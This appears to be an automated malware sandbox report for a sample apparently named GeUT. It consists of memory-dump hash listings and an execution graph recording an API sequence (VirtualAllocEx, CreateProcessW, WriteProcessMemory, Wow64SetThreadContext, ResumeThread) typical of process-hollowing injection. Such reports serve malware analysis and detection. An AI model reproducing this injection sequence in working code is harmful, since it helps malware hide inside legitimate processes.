                      • Instruction ID: c4512c07f2e2acf57a6a99e96dd729b61d9ab3fd03f66903583d9181e37c37e4
                      • Opcode Fuzzy Hash: 8cd5d29e5431c0359e3cb9cb570c9242fbd63c2889bbf9a892a997c478053cf7
                      • Instruction Fuzzy Hash: 109190747002058FDB19EB79E858A6E7FB6FF88300B1045ACE146EB3A9DF749D058B81
                      Memory Dump Source
                      • Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b3c81b771b5c3ba19471341a8565dd6219176e010a992f56f8772cdd3e53ca03
                      • Instruction ID: 0c98c2325d862580c623fa94032e6c89fe41fdddbd1fdba28f5928036a007277
                      • Opcode Fuzzy Hash: b3c81b771b5c3ba19471341a8565dd6219176e010a992f56f8772cdd3e53ca03
                      • Instruction Fuzzy Hash: 8D31AD31B00B418BDB2AAB79981816E7EE2BFC9211300993DD157DB794DF74DD058BC2
                      Memory Dump Source
                      • Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0eb4b5fcfc63bcf5f131ff7d91bc55be42c2eb7fe896eb365310d1d7990a9dae
                      • Instruction ID: bc25c3273c12d5084069ae4852add3df1a92b8983b4cdf946c49f61261c8c3ca
                      • Opcode Fuzzy Hash: 0eb4b5fcfc63bcf5f131ff7d91bc55be42c2eb7fe896eb365310d1d7990a9dae
                      • Instruction Fuzzy Hash: D9219071B012459FDB44EBF9881836EBEEAEFC8310B14442DE54AD7356DE748D0147A1
                      Memory Dump Source
                      • Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4fd9e9c309aa6ba8ff9339d86ac53e4bc1ccd6a8ae45076ffdffcf5aa6179e5d
                      • Instruction ID: c50c7d86b3950c8d808c2d2f3a0e7e8f0460ab2b933122b1050fc72564bd8eb0
                      • Opcode Fuzzy Hash: 4fd9e9c309aa6ba8ff9339d86ac53e4bc1ccd6a8ae45076ffdffcf5aa6179e5d
                      • Instruction Fuzzy Hash: FF21CF30A05248CFDB49EBB8D8552AE7BF1EF89310F1044A9E809EB295EB705D14CB91
                      Memory Dump Source
                      • Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3d8747f77dec85abb7862502dc5871a7a4060459966b9edf2f50d9be78f9b82c
                      • Instruction ID: 46f401b022294a52f8f098cbe3404db196791fe13d0acf6883ec38680a042844
                      • Opcode Fuzzy Hash: 3d8747f77dec85abb7862502dc5871a7a4060459966b9edf2f50d9be78f9b82c
                      • Instruction Fuzzy Hash: E8217C74A0020ADFDB45EBB8D8406AEBFB6FFC8304F1046A9D105A7359EBB06A40CB50
                      Memory Dump Source
                      • Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 131c6902fc61083107393ca4b2c2c47937e4e0042e8b766adaa45670f26ef688
                      • Instruction ID: d17d2d0c495dece2835c090744251313631a2730bed1e91692d0dd78c9f02669
                      • Opcode Fuzzy Hash: 131c6902fc61083107393ca4b2c2c47937e4e0042e8b766adaa45670f26ef688
                      • Instruction Fuzzy Hash: 8121DA74505A46DFDB06EB28F8809857FB9FB857047006ADDD1049B22EDAB46A0ACB80
                      Memory Dump Source
                      • Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 16ae920e379441b9b3fb620366e0f61727922bff1b813587d4708aaa14e40493
                      • Instruction ID: 2fda607ec7792dfc71bee07af1389e7377359fe24ad3109b624b5caa01a5cc14
                      • Opcode Fuzzy Hash: 16ae920e379441b9b3fb620366e0f61727922bff1b813587d4708aaa14e40493
                      • Instruction Fuzzy Hash: B1117A74501A46DFDB06FF18F980A857FAEF7C4704B00AADC91049B22DDAF46A0A8F80
                      Memory Dump Source
                      • Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 862a20bb6d0b1dd7cdaa5284546546940eb64c3a4f45e2fb220738fc06b2f3f8
                      • Instruction ID: 8e9f4eee69e91e38c66029e128a26770621cd606a1588009c25bb0859cf06268
                      • Opcode Fuzzy Hash: 862a20bb6d0b1dd7cdaa5284546546940eb64c3a4f45e2fb220738fc06b2f3f8
                      • Instruction Fuzzy Hash: AD513E74A0424A8FDB05BF78E85896E7FF2BB893017005A6DD106CB2A5EF74AD05DB81
                      Memory Dump Source
                      • Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f26a31d2a685af71b833fff1e2c3d5aaeabc1b2b46d3dcbcd2fa1c2d3d364b41
                      • Instruction ID: 1947bd76d6dc7b274a927d294e690267749309079276802ea07a7c338d332f56
                      • Opcode Fuzzy Hash: f26a31d2a685af71b833fff1e2c3d5aaeabc1b2b46d3dcbcd2fa1c2d3d364b41
                      • Instruction Fuzzy Hash: 9D915D34B0024A8FDB05AF78E858A6E7FF2BF89301B10556DE106DB3A5EF749C059B81
                      Memory Dump Source
                      • Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4e7914f6e3e7bfd940418be88c5712e604f06d7d6c39d1d5e67adf495b8ad12b
                      • Instruction ID: b71699af24e225998495c223af46089947bd018fcbac2d9d86e1e6488e6898bf
                      • Opcode Fuzzy Hash: 4e7914f6e3e7bfd940418be88c5712e604f06d7d6c39d1d5e67adf495b8ad12b
                      • Instruction Fuzzy Hash: 3C319A71B00B458BDB15BB79982852E7AE2BFC53603109A3DD157CB791DF78ED008B91
                      Memory Dump Source
                      • Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a04e3a3e7b709feb43b284bd1e0f8ff49cc78d9dd35734c8086bab8239bcd0fd
                      • Instruction ID: 5894804a6b65fe7afaaef21c799fed2bb109686c57884aaa0dbdd4e656defda0
                      • Opcode Fuzzy Hash: a04e3a3e7b709feb43b284bd1e0f8ff49cc78d9dd35734c8086bab8239bcd0fd
                      • Instruction Fuzzy Hash: 46314C7490420AEFDB45FFB8D8916AD7FB2FF89300F10466AD101AB355EB746A40CB51
                      Memory Dump Source
                      • Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f054816eb6d6a28918300605c3892c1ee0da838af670a5fcd3b8f2a9dcc24e86
                      • Instruction ID: 63beff8e24848300c7ce2f778611b407ef6be3d25c5520c647b801bb4a2875f6
                      • Opcode Fuzzy Hash: f054816eb6d6a28918300605c3892c1ee0da838af670a5fcd3b8f2a9dcc24e86
                      • Instruction Fuzzy Hash: A4215E71B002099FDB44ABF9881936FBAEBEFC9350B14442EE64AD7356DD748D0187A1
                      Memory Dump Source
                      • Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 463a145cdcb478e6ce5692aea50641f57b5b271e34d84f6f1ea6956e37607aab
                      • Instruction ID: b0fb3b531a47b8bedbb180e810d0c0e503fd66b64d4161aee89e63c7283d0df4
                      • Opcode Fuzzy Hash: 463a145cdcb478e6ce5692aea50641f57b5b271e34d84f6f1ea6956e37607aab
                      • Instruction Fuzzy Hash: 2A216D74A0020AEFDB44FFB8D8816AD7FB6FF88300F10466AD105AB345EB746A40CB50
                      Memory Dump Source
                      • Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a97d8c5cb464a48e6f58a5ff812def32a34ae3bc34d8eed387b219ba4e4d5b2
                      • Instruction ID: 8d344c1751a5dfbe97556a46cac84d1bec538aeb1721158a9e51d55d7bd5b868
                      • Opcode Fuzzy Hash: 8a97d8c5cb464a48e6f58a5ff812def32a34ae3bc34d8eed387b219ba4e4d5b2
                      • Instruction Fuzzy Hash: 6B219D30E09249DFDB45EBB8D8557AEBFE1AF85300F1081A9D40AEB286DB708D14DB81
                      Memory Dump Source
                      • Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e0f6266002e676427c359bbcd58dc7e2474fb55a7cf19e0b2afb7f31e016609b
                      • Instruction ID: d6228ed9e45dc779ed43196c0b9fc6b431c1de41e1e55b71f6b45de6975d4472
                      • Opcode Fuzzy Hash: e0f6266002e676427c359bbcd58dc7e2474fb55a7cf19e0b2afb7f31e016609b
                      • Instruction Fuzzy Hash: 20211B3410D24AEFDB06EF2CF8929453F75FB897047045AABD1489F26ADAB46D09CBC1
                      Memory Dump Source
                      • Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5412b376a3aa5edcd5b7aa079cf795abcadb7f4151c21c024902597a966089e0
                      • Instruction ID: b6a8a86cd6a1a57753c7d978719026182a74ccd53d79dde09510cf873a123315
                      • Opcode Fuzzy Hash: 5412b376a3aa5edcd5b7aa079cf795abcadb7f4151c21c024902597a966089e0
                      • Instruction Fuzzy Hash: EF116C7411910AEFDB06FF2CF9C2A457BA5F78C704700AA6E91489F21DDAB46D099B81
                      Memory Dump Source
                      • Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_880000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a799244c71033f24f60100e0e990532a796e68f93038e8ba7ac63f88239a06a0
                      • Instruction ID: 89b939aec9b150719b06c1ca846fae011c5e6c99e9af8473ee59e86fee578c18
                      • Opcode Fuzzy Hash: a799244c71033f24f60100e0e990532a796e68f93038e8ba7ac63f88239a06a0
                      • Instruction Fuzzy Hash: 83A1A474B002188FDF18EB74885867E7BB6FFC8710B14896DE546DB395DE349C029B91
                      Memory Dump Source
                      • Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_880000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 888362c39310690b89f96e787be79c8a0d54dd9bf5e6dbf972cdff4b3955d07d
                      • Instruction ID: 7f21cb2578c72d363c3860275f3f320433fa920df08c7619df25b7bea138f10d
                      • Opcode Fuzzy Hash: 888362c39310690b89f96e787be79c8a0d54dd9bf5e6dbf972cdff4b3955d07d
                      • Instruction Fuzzy Hash: E15169746006428FDB56BFB8E95882E7FE2FBC53043009A6DD506DB2B5EF749C098B91
                      Memory Dump Source
                      • Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_880000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 160e77d4bb70727f3b976edc1ce01aeff6ca596e83f47433e2ac8f78db2b9fd2
                      • Instruction ID: d857b86f8f60495731283e1466ac978a13eacea600108fe2f30b625850c45c2a
                      • Opcode Fuzzy Hash: 160e77d4bb70727f3b976edc1ce01aeff6ca596e83f47433e2ac8f78db2b9fd2
                      • Instruction Fuzzy Hash: 11918A347006428FDB55AB78E858A2E7FE2FFC9304B00896DE506DB3A5EF749C058B91
                      Memory Dump Source
                      • Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_880000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c4dace8ae9304ef56994e7d37344942a7d13fdbfff506b1a02f00374e486263f
                      • Instruction ID: c851c4c4fc9c2f1fa6a6b4d6e8793a62f90d108b8396ce7f6248a5e1ac3b7e69
                      • Opcode Fuzzy Hash: c4dace8ae9304ef56994e7d37344942a7d13fdbfff506b1a02f00374e486263f
                      • Instruction Fuzzy Hash: 3E310A31B012968FCF18AB79985467E7BF6FFC5300B14846DD806DB386DE349D0687A1
                      Memory Dump Source
                      • Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_880000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 85283c46617994eae4a73ed2836542866030e42b0adc2be7748ee42b387061ce
                      • Instruction ID: 9087f12ad9f868d64935b4a4ad749ccb93cd3273869379375f4f6c1ae36ecf65
                      • Opcode Fuzzy Hash: 85283c46617994eae4a73ed2836542866030e42b0adc2be7748ee42b387061ce
                      • Instruction Fuzzy Hash: C6315871B00A518BDA65BB79982812E7AE2FFC53103108E3DD656CB790DF74DD048B92
                      Memory Dump Source
                      • Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_880000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 37ba14bd5356e0473b0c358e503de2efc82a981c315ed6584247542002e16330
                      • Instruction ID: ae111aa6a3ffeb420e8826d7fe3a8792c30e1a1db87468249a25ac2468b0f19b
                      • Opcode Fuzzy Hash: 37ba14bd5356e0473b0c358e503de2efc82a981c315ed6584247542002e16330
                      • Instruction Fuzzy Hash: D1218161B042159BDB54ABFD882926FBEEAFFC8340B14842ED54AD7356DD748C0147A2
                      Memory Dump Source
                      • Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_880000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bd9d976f7a530bee15f717b3e0a26265a4b95b17c48d1100c8d70d1a4f80029e
                      • Instruction ID: 6ec068b7a0b3896cd98d9f56cb1ebe27c920bc352dbfab9a45b45c9a72433511
                      • Opcode Fuzzy Hash: bd9d976f7a530bee15f717b3e0a26265a4b95b17c48d1100c8d70d1a4f80029e
                      • Instruction Fuzzy Hash: 65318C74A0020ADFDB45EFB8E954AAE7FB2FF84304F104A6DD501AB395DBB06A44CB51
                      Memory Dump Source
                      • Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_880000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6862c2d2c66465e8cc96699f4c099685e5c24eb8abccef3fd730b666435791cc
                      • Instruction ID: 7fef6f966d8a86f89ae8c90b8d713a97b1e35d6f91a2873aa6cb4c04739ec474
                      • Opcode Fuzzy Hash: 6862c2d2c66465e8cc96699f4c099685e5c24eb8abccef3fd730b666435791cc
                      • Instruction Fuzzy Hash: D4215C74A0020ADFDB44EFB8D954AAE7FB2FF84304F104A69D505BB355DB746A40CB51
                      Memory Dump Source
                      • Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_880000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 68a1510a42557670b7745d7bcf85ac0d1b1fbbe557b7bffa10cd97751a282200
                      • Instruction ID: 517eec148dd53d6c1ee1d4ef47ba92fbae3903afedc0e8be1850fe50ef1f5c6a
                      • Opcode Fuzzy Hash: 68a1510a42557670b7745d7bcf85ac0d1b1fbbe557b7bffa10cd97751a282200
                      • Instruction Fuzzy Hash: 93218E30A05258DFCB58EBB8D8553AE7BF1FF84300F1084A9C549DB286EB709E18CB91
                      Memory Dump Source
                      • Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_880000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0e1c173a13181827fc3c6275cafec2b528fa911367e9faff59c8ca82f9362618
                      • Instruction ID: 99b631ac6aa3053b3b240854721b17419666761c4ba0e1335e3800cbcabe07e8
                      • Opcode Fuzzy Hash: 0e1c173a13181827fc3c6275cafec2b528fa911367e9faff59c8ca82f9362618
                      • Instruction Fuzzy Hash: DE116A34301207DFDB46FFB8FA88A457FE5F78430C700AA599104BF269DAF46A058B80
                      Memory Dump Source
                      • Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 03cac1cfad53a4cd14041148b68492e8d7f85cac324689edff67576c3272e3be
                      • Instruction ID: c792e667ccc82f5b5fcc66ea2573825b018ac6bda113cc0fc707019f4124fa62
                      • Opcode Fuzzy Hash: 03cac1cfad53a4cd14041148b68492e8d7f85cac324689edff67576c3272e3be
                      • Instruction Fuzzy Hash: DCA1B039F002199FDB08DB79885467E7BB7BFC8750B198869D506EB388CE359C02CB91
                      Memory Dump Source
                      • Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0ecdb8d7750064c098ab4754c69f9bb37b50670b4d013a131a759b24adb6f1b1
                      • Instruction ID: a50d1ae7f5b2325b8b1da05220ea559c44ed68548b02a387850cd2472d9e9143
                      • Opcode Fuzzy Hash: 0ecdb8d7750064c098ab4754c69f9bb37b50670b4d013a131a759b24adb6f1b1
                      • Instruction Fuzzy Hash: F4513C38A106468FDB05BB78E85C96D7BA6FB883003005A7CD5278B795EF74981ACF91
                      Memory Dump Source
                      • Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8cf01462e4c911814907d3279aceb95899201d23acdd5759436e76fe6b718e7a
                      • Instruction ID: 21c5cd23ac263779d5d61aadff4e6de8a1662188dada69da3aef3bbc23d49ea0
                      • Opcode Fuzzy Hash: 8cf01462e4c911814907d3279aceb95899201d23acdd5759436e76fe6b718e7a
                      • Instruction Fuzzy Hash: 68915E38B002458FDB05AB79D85CA2E7BB6FB88300B104969E516DB3E5EF749C09CB91
                      Memory Dump Source
                      • Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6cdabae952c6596ef206d2ac50c825088de90870ed5a7d5fe1ec95818ae3d7f6
                      • Instruction ID: d59fe83020e9bf83074e8f6ee45afe5b3b1d2722dbf82e0049dbb3f1f6dbb3c4
                      • Opcode Fuzzy Hash: 6cdabae952c6596ef206d2ac50c825088de90870ed5a7d5fe1ec95818ae3d7f6
                      • Instruction Fuzzy Hash: 4E319375B00209AFEB44ABF9D81877EBFABEFC4310F104469D64AD7385DE7449028B61
                      Memory Dump Source
                      • Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6087a0083423a449e709a775f2f9b7f2828a9b276eebcdb475d0aa6ba2799ff0
                      • Instruction ID: e068d38788efc1836914605a8de475106575940cb17a4cda314bf7107f32f8be
                      • Opcode Fuzzy Hash: 6087a0083423a449e709a775f2f9b7f2828a9b276eebcdb475d0aa6ba2799ff0
                      • Instruction Fuzzy Hash: 05312435B012969FDB58EB79985427EBBF7AFC8300B14846DD54ADB389DE308C06CB91
                      Memory Dump Source
                      • Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0cd913a7280ea9028344a976b0247027b9af09385f4dc0ec0160d17e6b28ce8d
                      • Instruction ID: 88f70f2ab5e78155498d88d88116c5d23624a85497efd901366a83d39ac611a9
                      • Opcode Fuzzy Hash: 0cd913a7280ea9028344a976b0247027b9af09385f4dc0ec0160d17e6b28ce8d
                      • Instruction Fuzzy Hash: 57315835B00B458BDA15AB79C81862EBAE2BFC52103108E3DD56ACB780DF74DD188F92
                      Memory Dump Source
                      • Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 945b9783d16c01c2e44f2754ea8e12e2b02eb3035a7fa72f2fe1b8190e3245d6
                      • Instruction ID: fa48ae428d9151a8e6419263115543131061eaa9f32b050d58d6701f246dc239
                      • Opcode Fuzzy Hash: 945b9783d16c01c2e44f2754ea8e12e2b02eb3035a7fa72f2fe1b8190e3245d6
                      • Instruction Fuzzy Hash: A431AC78E0020ADFDB45EBB8D8546AEBFB6FF84300F104569D105AB385EB746A45CF51
                      Memory Dump Source
                      • Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 83fce5f4bc7f0baa794f6d0f4eef3c83bfb3da5ee52274423712706693893286
                      • Instruction ID: a8966646d1f2148c31cada4149b9539c8c1307dbd5ff239401d1ce77445d40dd
                      • Opcode Fuzzy Hash: 83fce5f4bc7f0baa794f6d0f4eef3c83bfb3da5ee52274423712706693893286
                      • Instruction Fuzzy Hash: F421AE34E042099FDB45EBB8D8583AE7BE6EF84310F1080B9D909DB285EB749D46CB91
                      Memory Dump Source
                      • Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0766bf96918207f1551e6626e072e29b2a94de7de425378d11605ab687a2d869
                      • Instruction ID: d5f526368f3392a5b83396ca5779c2d73577fd64654beceb50cef623f9120ad7
                      • Opcode Fuzzy Hash: 0766bf96918207f1551e6626e072e29b2a94de7de425378d11605ab687a2d869
                      • Instruction Fuzzy Hash: FF215A78E0020ADFDB44FBB8D8546AEBBB6FF84300F104A69D105AB385EB746A45CF51
                      Memory Dump Source
                      • Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3f7ad01dce587d2e6183d632ffa6674337693a66a6aaeb94d26338b31258dbfb
                      • Instruction ID: 29b048ca97475dcd55c411b3837e9ba905205b208d7c15cbdff15bca2140b29d
                      • Opcode Fuzzy Hash: 3f7ad01dce587d2e6183d632ffa6674337693a66a6aaeb94d26338b31258dbfb
                      • Instruction Fuzzy Hash: 0411893450120BDFDF06FF28F984A557BB9FB84304B00AA6C91249F35DDAB4690B9F90

                      Execution Graph

                      Execution Coverage:29.6%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:39
                      Total number of Limit Nodes:4
                      execution_graph 3814 b320f0 VirtualAllocEx 3815 b321a7 3814->3815 3816 b371d0 3818 b371ea 3816->3818 3817 b37239 3818->3817 3821 b37288 3818->3821 3825 b3727c 3818->3825 3822 b372bb 3821->3822 3829 b3614c 3822->3829 3824 b374af 3824->3818 3826 b37288 3825->3826 3827 b3614c CreateProcessW 3826->3827 3828 b374af 3827->3828 3828->3818 3830 b37ce8 CreateProcessW 3829->3830 3832 b37ece 3830->3832 3833 b32338 ResumeThread 3834 b323c0 3833->3834 3835 b321f8 3836 b32261 3835->3836 3837 b32276 WriteProcessMemory 3835->3837 3836->3837 3838 b322d8 3837->3838 3843 b31fd8 ReadProcessMemory 3844 b32097 3843->3844 3845 b35f98 3847 b35fb2 3845->3847 3846 b36001 3847->3846 3849 b36450 3847->3849 3851 b36483 3849->3851 3853 b34024 3851->3853 3852 b36677 3852->3847 3854 b36eb0 CreateProcessW 3853->3854 3856 b37096 3854->3856 3856->3856 3861 b31ba8 3862 b31c35 CreateProcessW 3861->3862 3864 b31d8e 3862->3864 3864->3864 3865 b31ec8 3866 b31f26 3865->3866 3867 b31f3b Wow64SetThreadContext 3865->3867 3866->3867 3868 b31f84 3867->3868

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 29 b35c6c-b35c6e 30 b35c72 29->30 31 b35c70 29->31 32 b35c76-b35d03 30->32 33 b35c74 30->33 31->30 34 b35d05-b35d17 32->34 35 b35d1a-b35d28 32->35 33->32 34->35 36 b35d2a-b35d3c 35->36 37 b35d3f-b35d7b 35->37 36->37 38 b35d8f-b35e5c CreateProcessW 37->38 39 b35d7d-b35d8c 37->39 43 b35e65-b35f24 38->43 44 b35e5e-b35e64 38->44 39->38 54 b35f26-b35f4f 43->54 55 b35f5a-b35f65 43->55 44->43 54->55 59 b35f66 55->59 59->59
                      APIs
